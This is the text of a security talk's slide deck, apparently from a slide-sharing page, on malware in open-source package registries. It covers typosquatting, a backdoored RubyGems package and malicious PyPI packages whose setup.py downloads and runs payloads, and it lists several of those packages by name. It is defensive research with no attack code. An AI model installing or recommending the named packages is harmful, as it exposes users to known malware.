Mitigating Open-source Software Supply Chain Attacks

Mitigating Open-source Software Supply Chain Attacks Ashish Bijlani, Ajinkya Rajput
Ossillate Inc.

The state of open-source software • De-facto standard way of
developing digital products/services • Open source software makes up at least 70% of all software ◦ Source: 2020 Synopsys report “Software is eating the world” - Marc andreessen, 2011 “Open-source software is eating the world” - Everybody, 2021

Open-source software distribution: packages • Code is “packaged” and published
on Package Managers ◦ Example, PyPi hosts over 300K Python packages • Code is “sourced” from Package Managers by installing ◦ Example, pip3 install dateutils # Packages

In open-source software, we trust • Anybody can publish packages
◦ Individual developers, groups, and companies • Software we use on our servers, laptops, phones, coffee makers, baby monitors, <add your favorite digital device here> is written by unknown volunteers ◦ Which we blindly TRUST?

Bad actors capitalize on our trust by exploiting weakness in
the code we source AS WELL AS the way we source it

Security weaknesses in the code (a.k.a. vulnerabilities) • Are programming
bugs introduced accidentally, ◦ Example, buffer overflow (due to missing bound checks) • Pose indirect threats ◦ Need an exploit to trigger the buggy code ◦ May not always have a high impact • Can be fixed by upgrading to the latest version/release

Security weaknesses in the distribution/sourcing process • Anybody can publish
their packages using their credentials • No checks or code vetting • Packages are searched and installed using names ◦ Package Managers (e.g., PyPi, NPM) do not show source code • Bad actors exploit new attack vectors to propagate malware 7

Malware in open-source software packages

Case study: mitmproxy2 - Typosquatting attack - Impersonates “mitmproxy” -
Exploits name typo during installation or dev inexperience - Removes safeguards: everyone on the same network can execute code on your machine with a single HTTP request

Case study: rest-client RubyGems package (100M+ downloads) Under production environment,
it downloads malicious payload via patebin.com and executes via eval, which installs a Remote-Code-Execution (RCE) backdoor on web servers

Unlike vulnerabilities, malware is • Intentionally harmful code (NOT accidental
programming bug), ◦ Example, backdoor installed to steal sensitive data • Poses direct and dangerous threats ◦ Doesn’t need an exploit - itself is an exploit (e.g., triggered on installation) ◦ Is obfuscated to avoid detection ◦ Hidden in popular packages for wider reach ◦ Evasive - may only trigger under narrow conditions (e.g. production) • Can only be fixed by yanking malicious package/dependency version

Can we improve the sourcing process? • Today, package stability/maturity/popularity/reputation/safety
is inferred from ◦ Number of GitHub stars/forks, ◦ Number of open issues on GitHub, ◦ Number of downloads ◦ Project documentation/website, ◦ Number of recent code commits, ◦ Number of tests cases ◦ Backing companies (e.g., FB, Uber) • BUT, ◦ Stars/forks/downloads are attacker-controlled ◦ Impersonated projects have the same website/documentation/tests/commits ◦ Should we look at the package code and hundreds of dependencies?

Our focus 1. Background 1. Malware in open-source software 1.
Our work 1. Findings

About me Ashish Bijlani, Ph.D. Research Scientist, Ossillate, Inc. -
Graduated Dec’20, Georgia Tech - Cybersecurity/Systems research - Creator of ExtFUSE file system - eBPF + FUSE = Much faster FUSE - Created a 32-bit x86 OS (Capital) that boots from a 5.25” floppy disk

Our work • Started as a research project at Georgia
Tech in 2019 ◦ Downloaded and analyzed over 1.3M NPM+PyPi+RubyGems packages (60TB) ◦ Detected 339 previously unknown malware (82% confirmed, 3 CVEs, many over a year old) ◦ Details in academic paper: https://arxiv.org/pdf/2002.01139.pdf • Funded by NSF to continue development • Continuous scanning of packages ◦ PyPi supported (more coming soon!)

Our technology - Deep static analysis (Abstract Syntax Tree construction
+ API analysis) - Dynamic analysis (API monitoring during installation) - Metadata analysis (millions of data points)

Our recent findings (malicious PyPi packages) - https://pypi.org/project/dandh811/ - https://pypi.org/project/KrisQian/
- https://pypi.org/project/dpp-client - https://pypi.org/project/defal96863 - https://pypi.org/project/idodaniel/ - and more...

Findings: malware 1 - Homepage redirects to billibilli.com - Setup.py
downloads and executes a script with hidden output - Payload execution code is present for Windows and Linux. Commented for Darwin. MALWARE

Findings: malware 1 -invalid email, -homepage redirects to injection.vip -
setup.py script downloads and spawns a python file (the download server is unreachable now) - comment mentions for security testing only, but the payload is unavailable MALWARE

Announcing three FREE tools for developers (in BETA) • Smart
assistant for sourcing open-source software packages ◦ Package explorer - web app at https://ossillate.com ◦ Command Line - PyPi package (releasing later today!) ◦ GitHub Actions Plugin (coming soon!) • Flag packages that are: ◦ Malicious (malware), ◦ Suspicious (potentially malicious), ◦ Vulnerable (containing CVEs), ◦ Undesirable (possessing unwanted attributes) • Supported Package Managers ◦ PyPi, more coming soon!

Thank you! Visit us at ossillate.com Write to us: [email protected]
Get in touch with us on Slack https://join.slack.com/t/ossillatecommunity/ shared_invite/zt-yfezeo6u- Fb5iBqODh2UJT1i8LmAjMQ

Mitigating Open-source Software Supply Chain At...

Mitigating Open-source Software Supply Chain Attacks

Ashish Bijlani

More Decks by Ashish Bijlani

Other Decks in Technology

Featured

Transcript

Mitigating Open-source Software Supply Chain Attacks Ashish Bijlani, Ajinkya Rajput

The state of open-source software • De-facto standard way of

Open-source software distribution: packages • Code is “packaged” and published

In open-source software, we trust • Anybody can publish packages

Bad actors capitalize on our trust by exploiting weakness in

Security weaknesses in the code (a.k.a. vulnerabilities) • Are programming

Security weaknesses in the distribution/sourcing process • Anybody can publish

Malware in open-source software packages

Case study: mitmproxy2 - Typosquatting attack - Impersonates “mitmproxy” -

Case study: rest-client RubyGems package (100M+ downloads) Under production environment,

Unlike vulnerabilities, malware is • Intentionally harmful code (NOT accidental

Can we improve the sourcing process? • Today, package stability/maturity/popularity/reputation/safety

Our focus 1. Background 1. Malware in open-source software 1.

About me Ashish Bijlani, Ph.D. Research Scientist, Ossillate, Inc. -

Our work • Started as a research project at Georgia

Our technology - Deep static analysis (Abstract Syntax Tree construction

Our recent findings (malicious PyPi packages) - https://pypi.org/project/dandh811/ - https://pypi.org/project/KrisQian/

Findings: malware 1 - Homepage redirects to billibilli.com - Setup.py

Findings: malware 1 -invalid email, -homepage redirects to injection.vip -

Announcing three FREE tools for developers (in BETA) • Smart

Demo

Thank you! Visit us at ossillate.com Write to us: [email protected]